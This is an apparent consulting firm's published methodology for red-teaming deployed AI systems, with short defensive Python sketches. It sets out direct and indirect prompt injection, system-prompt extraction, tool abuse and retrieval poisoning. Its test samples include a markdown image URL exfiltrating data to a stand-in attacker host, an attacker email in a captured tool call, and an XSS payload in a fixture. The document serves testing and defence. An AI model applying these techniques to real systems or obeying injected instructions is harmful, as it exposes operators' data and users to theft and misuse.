The Adversarial Probing Methodology

Our 12-stage process for red-teaming production AI systems, from reconnaissance through remediation handoff. We publish it openly so clients can challenge how we work and the field can build on it — a methodology kept behind an NDA is one nobody can hold to account.

FRAMEWORK · V2.1 · Last updated May 2026

// OVERVIEW

What this document describes

Adversarial probing is the discipline of treating an AI system the way a motivated attacker would: not as a model to be benchmarked, but as a deployed system with surfaces, trust boundaries, and downstream consequences. The stages below run in sequence because each one produces evidence the next relies on — reconnaissance defines where to probe, baseline fingerprinting defines what counts as anomalous, and the early injection stages seed the payloads that later chaining stages combine.

The sequence is linear on paper and iterative in practice. A finding in stage 10 routinely sends us back to stage 05 with a sharper hypothesis. What does not change is the order in which evidence is established and the requirement that every reported finding survives independent verification.

// THE TWELVE STAGES

Reconnaissance through remediation handoff

01 · Scoping & threat model alignment

We agree on the system boundary, the assets worth protecting, and the adversary we are simulating. Scope is written down before testing starts and governs what is in and out of bounds. Without an explicit threat model, findings have no frame of reference for severity.

02 · Reconnaissance & surface mapping

We enumerate every entry point that reaches the model: chat surfaces, APIs, file ingestion, retrieval sources, connected tools, and any agent-to-agent channel. Each surface is catalogued with its trust assumptions and the data it can touch. The map drives where probing effort is concentrated.
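
As an illustration only, a surface catalogue of this kind could be kept as structured records and sorted to show where effort should go first. The `Surface` fields, the `Trust` levels, and the ranking rule are assumptions made for this sketch, not part of the published framework.

```python
from dataclasses import dataclass
from enum import IntEnum


class Trust(IntEnum):
    """Hypothetical trust levels an operator might assume for a surface."""
    UNTRUSTED = 0
    SEMI_TRUSTED = 1
    TRUSTED = 2


@dataclass(frozen=True)
class Surface:
    name: str
    kind: str                    # e.g. "chat", "api", "retrieval", "tool"
    assumed_trust: Trust         # what the operator assumes about this channel
    attacker_writable: bool      # can an outsider influence what arrives here?
    data_reach: frozenset[str]   # data the surface can touch


def prioritize(surfaces):
    """Rank surfaces: trusted-but-attacker-writable first, then by data reach."""
    def key(s):
        gap = int(s.assumed_trust) if s.attacker_writable else 0
        return (gap, len(s.data_reach))
    return sorted(surfaces, key=key, reverse=True)


surfaces = [
    Surface("chat", "chat", Trust.UNTRUSTED, True, frozenset({"conversation"})),
    Surface("kb_retrieval", "retrieval", Trust.TRUSTED, True,
            frozenset({"kb_docs", "customer_records"})),
    Surface("admin_api", "api", Trust.TRUSTED, False, frozenset({"config"})),
]
ranked = prioritize(surfaces)
```

The ranking rule encodes one possible reading of "trust assumptions": a channel the operator trusts but an attacker can write to is the most interesting place to start.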

03 · Baseline behavioral fingerprinting

Before attacking, we characterize how the system behaves normally — refusal patterns, system-prompt leakage under benign pressure, tool-invocation defaults, and response variance across seeds. This baseline is what every later anomaly is measured against. It also exposes the model family and guardrail stack in use.
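
A minimal sketch of what a baseline might record for one benign prompt sampled across seeds, and how a later observation could be compared against it. The refusal markers, the metrics, and the tolerance are placeholder assumptions; a real engagement would calibrate all of them per system.

```python
# Hypothetical refusal markers; real systems need a calibrated classifier.
REFUSAL_MARKERS = ("i can't", "i cannot", "i'm unable")


def is_refusal(text: str) -> bool:
    lowered = text.lower()
    return any(marker in lowered for marker in REFUSAL_MARKERS)


def fingerprint(responses):
    """Summarise responses to one prompt sampled across several seeds."""
    if not responses:
        raise ValueError("need at least one response")
    n = len(responses)
    refusals = sum(is_refusal(r) for r in responses)
    distinct = len({r.strip().lower() for r in responses})
    return {
        "samples": n,
        "refusal_rate": refusals / n,
        "distinct_ratio": distinct / n,  # crude proxy for response variance
    }


def is_anomalous(baseline, observed, tolerance=0.2):
    """Flag a shift in refusal rate larger than the (assumed) tolerance."""
    return abs(observed["refusal_rate"] - baseline["refusal_rate"]) > tolerance


baseline = fingerprint([
    "Sure, here you go.",
    "Sure, here you go.",
    "I can't help with that.",
    "Here is the answer.",
])
observed = fingerprint(["I cannot do that."] * 4)
```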

04 · Direct injection probing

We test the obvious adversarial surface first: user-supplied input that attempts to override instructions, extract the system prompt, or coerce out-of-policy output. This establishes the floor of the system's resistance and seeds payloads reused in later, more complex stages.
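
One common way to make system-prompt extraction measurable is to plant a canary string in the system prompt of a test deployment and check whether any response contains it. The sketch below assumes that setup; `send` is a hypothetical callable that submits a payload and returns the response text.

```python
import secrets


def make_canary() -> str:
    """Random marker to embed in the system prompt of a test deployment."""
    return f"CANARY-{secrets.token_hex(8)}"


def _normalize(text: str) -> str:
    # Drop case, spacing, and punctuation so trivially obfuscated leaks still match.
    return "".join(ch for ch in text.lower() if ch.isalnum())


def leaked(canary: str, response: str) -> bool:
    return _normalize(canary) in _normalize(response)


def run_direct_probes(send, payloads, canary):
    """Return the payloads whose responses leaked the canary.

    `send` is a hypothetical callable: payload -> response text.
    """
    return [p for p in payloads if leaked(canary, send(p))]
```

Payloads returned by `run_direct_probes` are natural candidates to carry forward into later stages. Normalisation here only catches simple spacing and casing tricks, not encoded or translated leaks.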

05 · Indirect / IPI vector mapping

We plant adversarial instructions in content the model later consumes: retrieved documents, web pages, emails, file metadata, and tool outputs. Indirect prompt injection (IPI) is where most production systems actually break, because the payload arrives through a channel the operator implicitly trusts. We map which sources can carry instructions and how far they propagate.
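
To make "how far they propagate" concrete, the sketch below reduces raw observations of a planted marker to the deepest channel each source reached. The channel names and their ordering are assumptions for this example only.

```python
# Hypothetical propagation depth: later entries are further from the source.
CHANNELS = ("context", "response", "tool_call", "persistent_store")


def propagation_map(observations):
    """Map each source to the deepest channel where its planted marker was seen.

    `observations` is an iterable of (source, channel) pairs.
    """
    deepest = {}
    for source, channel in observations:
        depth = CHANNELS.index(channel)  # raises ValueError on unknown channels
        if source not in deepest or depth > CHANNELS.index(deepest[source]):
            deepest[source] = channel
    return deepest


observations = [
    ("email", "context"),
    ("email", "tool_call"),
    ("web_page", "context"),
    ("file_metadata", "response"),
]
reach = propagation_map(observations)
```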

06 · Tool & agent containment testing

Where the model can call tools or other agents, we test whether a compromised prompt can drive those tools beyond intended authority. We probe argument injection, unintended tool chaining, and privilege boundaries between agents. The question is not whether a tool can be called, but what an attacker can make it do.
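
A hedged sketch of how intended authority could be written down and checked against tool calls captured during testing. `ToolPolicy`, the call format, and the example tool are all hypothetical.

```python
from dataclasses import dataclass, field
from typing import Callable, Mapping


@dataclass
class ToolPolicy:
    """Hypothetical statement of a tool's intended authority."""
    allowed_args: frozenset
    validators: Mapping[str, Callable[[object], bool]] = field(default_factory=dict)


def violations(call, policies):
    """List the ways a captured tool call exceeds its declared policy."""
    name, args = call["tool"], call["args"]
    policy = policies.get(name)
    if policy is None:
        return [f"tool not authorised: {name}"]
    problems = [f"unexpected argument: {k}" for k in args if k not in policy.allowed_args]
    for key, check in policy.validators.items():
        if key in args and not check(args[key]):
            problems.append(f"argument out of bounds: {key}")
    return problems


policies = {
    "send_email": ToolPolicy(
        allowed_args=frozenset({"to", "subject", "body"}),
        validators={"to": lambda v: isinstance(v, str) and v.endswith("@example.test")},
    )
}
captured = {
    "tool": "send_email",
    "args": {"to": "attacker@evil.test", "subject": "x", "body": "y", "bcc": "z"},
}
problems = violations(captured, policies)
```

The check looks at what the call would do (its arguments), not merely whether the tool is callable, which mirrors the question this stage asks.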

07 · RAG integrity & retrieval boundary testing

We test the retrieval layer as an attack surface in its own right: poisoning the index, crossing tenant or document-level access boundaries, and confusing the model about which retrieved content is authoritative. Retrieval that mixes trust levels in a single context window is treated as a finding regardless of whether we triggered it.
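
As a rough illustration, a check like the following could flag cross-tenant retrieval and mixed trust levels in a single assembled context. The chunk fields (`tenant`, `trust`) are assumed metadata; real retrieval stacks will label provenance differently, if at all.

```python
def retrieval_findings(chunks, requesting_tenant):
    """Inspect the chunks placed in one context window for boundary problems."""
    findings = []
    foreign = sorted({c["tenant"] for c in chunks if c["tenant"] != requesting_tenant})
    if foreign:
        findings.append(f"cross-tenant retrieval: {', '.join(foreign)}")
    levels = sorted({c["trust"] for c in chunks})
    if len(levels) > 1:
        findings.append(f"mixed trust levels in one context: {', '.join(levels)}")
    return findings


context = [
    {"id": "d1", "tenant": "acme", "trust": "internal"},
    {"id": "d2", "tenant": "acme", "trust": "public_web"},
]
found = retrieval_findings(context, requesting_tenant="acme")
```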

08 · Output handling & downstream sink analysis

Model output is rarely the end of the line — it lands in browsers, shells, databases, or other systems. We trace where output flows and test for injection into those sinks: markdown that exfiltrates, HTML that executes, content that drives an unsafe downstream action. A safe model with an unsafe sink is still an exploitable system.
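
For the "markdown that exfiltrates" case, one simple detection sketch is to list every image URL in model output that points at a host outside an allowlist, since a renderer that fetches it can carry data out in the query string, path, or subdomain. The regular expression covers only inline markdown images and the allowlist is an assumption.

```python
import re
from urllib.parse import urlparse

# Matches inline markdown images: ![alt](url ...)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")


def exfil_candidates(markdown: str, allowed_hosts):
    """Return image URLs that would be fetched from hosts outside the allowlist."""
    hits = []
    for url in MD_IMAGE.findall(markdown):
        host = urlparse(url).hostname
        if host and host not in allowed_hosts:
            hits.append(url)
    return hits


output = (
    "Here is the logo ![logo](https://cdn.example.test/logo.png) and a chart "
    "![x](https://attacker.test/p.png?d=c2VjcmV0)"
)
suspicious = exfil_candidates(output, allowed_hosts={"cdn.example.test"})
```

Reference-style images, raw HTML, and links that rely on a user click are out of scope for this sketch and would need their own checks.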

09 · Cost & abuse surface analysis

We measure how cheaply an attacker can impose cost or degrade availability — token amplification, recursive tool loops, denial-of-wallet, and unbounded retrieval. These rarely leak data but can make a system economically unviable to operate. The surface is quantified in attacker effort versus operator cost.
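
One way to express attacker effort versus operator cost is as an amplification factor plus an estimated bill per probe. The record fields and the prices in the usage lines are placeholders, not measurements or real pricing.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProbeCost:
    attacker_input_tokens: int  # tokens the attacker had to send
    operator_tokens: int        # all tokens billed to the operator as a result
    tool_calls: int             # tool invocations triggered by the probe


def amplification_factor(probe: ProbeCost) -> float:
    """Operator tokens consumed per attacker token sent."""
    if probe.attacker_input_tokens <= 0:
        raise ValueError("attacker_input_tokens must be positive")
    return probe.operator_tokens / probe.attacker_input_tokens


def operator_cost(probe: ProbeCost, price_per_1k_tokens: float,
                  price_per_tool_call: float) -> float:
    """Estimated operator spend for one probe under assumed unit prices."""
    return (probe.operator_tokens / 1000 * price_per_1k_tokens
            + probe.tool_calls * price_per_tool_call)


probe = ProbeCost(attacker_input_tokens=50, operator_tokens=20_000, tool_calls=10)
factor = amplification_factor(probe)
cost = operator_cost(probe, price_per_1k_tokens=0.01, price_per_tool_call=0.002)
```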

10 · Chained exploitation & escalation

We combine primitives from earlier stages into realistic attack paths: an indirect injection that triggers a tool call that writes to a sink that a second user reads. Single findings are often low severity in isolation and critical in chain. This stage is where the threat model from stage 01 is stress-tested against reality.
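
Chaining can be pictured as a path search: each confirmed primitive moves the attacker from one state to another, and a chain is a path from the attacker's starting position to the asset. The sketch below uses breadth-first search over hypothetical primitives modelled on the example in the paragraph above; the state names are invented for illustration.

```python
from collections import deque


def find_chain(primitives, start, goal):
    """Shortest sequence of primitive names leading from `start` to `goal`.

    `primitives` is a list of (name, requires, grants) tuples.
    Returns None when no chain exists.
    """
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        state, path = queue.popleft()
        if state == goal:
            return path
        for name, requires, grants in primitives:
            if requires == state and grants not in seen:
                seen.add(grants)
                queue.append((grants, path + [name]))
    return None


primitives = [
    ("indirect injection via retrieved document", "attacker_content", "model_control"),
    ("tool call writes to shared notes", "model_control", "sink_write"),
    ("second user reads the note", "sink_write", "victim_session"),
]
chain = find_chain(primitives, "attacker_content", "victim_session")
```

Real attack paths often need several preconditions at once. A single `requires` state keeps the sketch short at the cost of that realism.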

11 · Findings verification & severity scoring

Every candidate finding is reproduced independently and scored under our published severity model before it reaches a report. We discard anything we cannot reliably trigger and record exploit reliability as a first-class attribute. Scoring is tied to exploit reliability, data sensitivity, and blast radius, not to how impressive the payload looks. See the severity scoring model.
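
The published severity model is not reproduced here. The sketch below is a hypothetical stand-in that only shows the shape of the idea: reliability is measured from repeated attempts, unreliable candidates are discarded, and the score depends on reliability, sensitivity, and blast radius alone. The 1 to 5 scales, the multiplication, and the discard threshold are all assumptions.

```python
def exploit_reliability(successes: int, attempts: int) -> float:
    """Fraction of independent reproduction attempts that succeeded."""
    if attempts <= 0:
        raise ValueError("attempts must be positive")
    return successes / attempts


def score(reliability: float, sensitivity: int, blast_radius: int,
          min_reliability: float = 0.2):
    """Illustrative score; returns None when the finding is discarded.

    `sensitivity` and `blast_radius` use an assumed 1 to 5 scale.
    """
    if reliability < min_reliability:
        return None  # cannot be triggered reliably enough to report
    return round(reliability * sensitivity * blast_radius, 2)


solid = score(exploit_reliability(9, 10), sensitivity=4, blast_radius=3)
flaky = score(exploit_reliability(1, 10), sensitivity=5, blast_radius=5)
```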

12 · Remediation handoff & regression fixtures

We hand engineering teams reproducible test cases, not prose. Each confirmed finding ships with a fixture that fails against the vulnerable system and passes once fixed, so the issue stays closed. Remediation is a handoff, not a report thrown over the wall.
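
A minimal sketch of such a fixture, using an unsafe HTML sink as the example finding. `vulnerable_render` and `fixed_render` are stand-ins for a client's rendering code, and the payload is illustrative. A real fixture would call the actual system under test.

```python
import html

PAYLOAD = "<img src=x onerror=alert(1)>"  # illustrative payload from a finding


def vulnerable_render(model_output: str) -> str:
    """Stand-in sink that inserts model output into HTML unescaped."""
    return f"<div class='answer'>{model_output}</div>"


def fixed_render(model_output: str) -> str:
    """Stand-in for the remediated sink: output is escaped before insertion."""
    return f"<div class='answer'>{html.escape(model_output)}</div>"


def fixture_passes(render) -> bool:
    """True only when the payload cannot reach the page as live markup."""
    return "<img" not in render(PAYLOAD)
```

Run against `vulnerable_render` the fixture fails, and against `fixed_render` it passes, which is the property that lets it sit in a regression suite after the fix ships.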

// WHAT THIS IS NOT

Drawing the boundary explicitly

Not a benchmark

We do not produce a leaderboard score. Benchmarks measure average-case behavior against a fixed dataset; we measure whether a specific production system can be made to do something it should not.

Not automated scanning

Automated scanners fire known payloads and report matches. They cannot reason about a novel trust boundary or chain primitives into an escalation path. We use tooling to scale recon, never to replace adversarial judgment.

Not compliance theater

A passing engagement is not a certificate to wave at auditors. The deliverable is a set of exploitable paths and the fixtures that close them. If nothing is found, we say what we tried and where the residual risk lives.

Changelog

Versions are published, not edited silently. Each entry records what structurally changed and why.

V2.1 · May 2026

- Added stage 09, cost & abuse surface analysis, as a distinct phase with attacker-effort-versus-operator-cost quantification.
- Expanded indirect prompt injection coverage in stage 05 to cover tool-output and file-metadata carriers.
- Clarified that retrieval mixing trust levels in one context window is a finding regardless of trigger.

V2.0 · Jan 2026

- Restructured the framework from 8 phases to 12 stages, separating reconnaissance, fingerprinting, and the distinct injection classes.
- Introduced regression fixtures as a required deliverable in the remediation handoff stage.
- Aligned severity scoring with the published v1.x severity model rather than ad-hoc per-engagement bands.

V1.2 · Sep 2025

- Added explicit RAG integrity testing as a named phase after recurring retrieval-boundary findings.
- Formalized baseline behavioral fingerprinting as a prerequisite to any active probing.

V1.0 · Mar 2025

- Initial public release of the adversarial probing process: 8 phases, direct and indirect injection, tool containment.